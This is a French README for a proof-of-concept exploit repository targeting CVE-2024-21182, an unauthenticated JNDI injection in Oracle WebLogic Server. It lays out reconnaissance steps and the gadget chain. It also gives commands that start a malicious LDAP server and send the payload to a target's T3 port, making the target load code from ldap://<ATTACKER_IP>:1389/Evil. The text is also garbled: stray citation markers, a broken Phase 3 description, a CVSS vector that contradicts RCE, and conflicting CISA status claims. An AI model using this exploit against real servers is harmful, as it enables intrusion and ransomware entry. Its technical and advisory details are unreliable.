
Exploit de preuve de concept pour CVE-2024-21182, une injection JNDI non authentifiée menant à une exécution de code à distance sur Oracle WebLogic Server via les protocoles T3/IIOP. Inclut un laboratoire Docker pour les tests.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 est une vulnérabilité d'injection JNDI non authentifiée affectant le composant Core d'Oracle WebLogic Server. Elle permet à un attaquant distant, via les protocoles T3 ou IIOP, d'exécuter du code arbitraire (RCE) sur le serveur, pouvant obtenir un accès complet à toutes les données du serveur[citation:5][citation:8][citation:9].
Ce dépôt contient une Preuve de Concept (PoC) fonctionnelle qui démontre l'exploitation réussie du correctif de CVE-2023-21839 via la chaîne de gadgets AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Phase 1 : Reconnaissance : Identifier les serveurs WebLogic avec les ports T3/IIOP (7001) exposés.
Phase 2 : Analyse : Déterminer si le serveur exécute une version vulnérable (12.2.1.4.0 ou 14.1.1.0.0) ou ne dispose pas du correctif d'Octobre 2024.
Phase 3 : Exploitation (flux technique) :
AggregatableOpaqueReference[citation:2].referent de l'objet précédent est modifié pour pointer vers un MessageDestinationReference malveillant[citation:4].wlthint3client.jar (peut être extrait d'une installation de WebLogic).# 1. Cloner le dépôt
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Démarrer le laboratoire (victime + attaquant)
docker-compose up -d
# 3. Exécuter l'exploitation automatique
./validate.sh
# 1. Démarrer le serveur LDAP/HTTP malveillant
python3 exploit/ldap_server.py
# 2. Dans un autre terminal, exécuter le payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
Statut actuel selon CISA : "Connu comme étant utilisé dans des campagnes de ransomware ? Inconnu" (Mais typiquement oui, les RCE dans les middlewares sont un vecteur initial dans les intrusions de ransomware).
Ce code est uniquement à des fins éducatives et de recherche. Toute utilisation abusive de cette PoC contre des systèmes sans autorisation expresse est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.
| Attribut | Valeur |
|---|
| CVE | CVE-2024-21182 |
| Produit | Oracle WebLogic Server (Core) |
| Versions affectées | 12.2.1.4.0 et 14.1.1.0.0[citation:7] |
| Correctif disponible | Oracle Critical Patch Update (Juillet 2024 et Octobre 2024)[citation:6] |
| Statut dans CISA KEV | Exploitation active confirmée (ajoutée le 01/06/2026)[citation:3][citation:8] |
| Date limite d'atténuation (CISA) | 04/06/2026[citation:8] |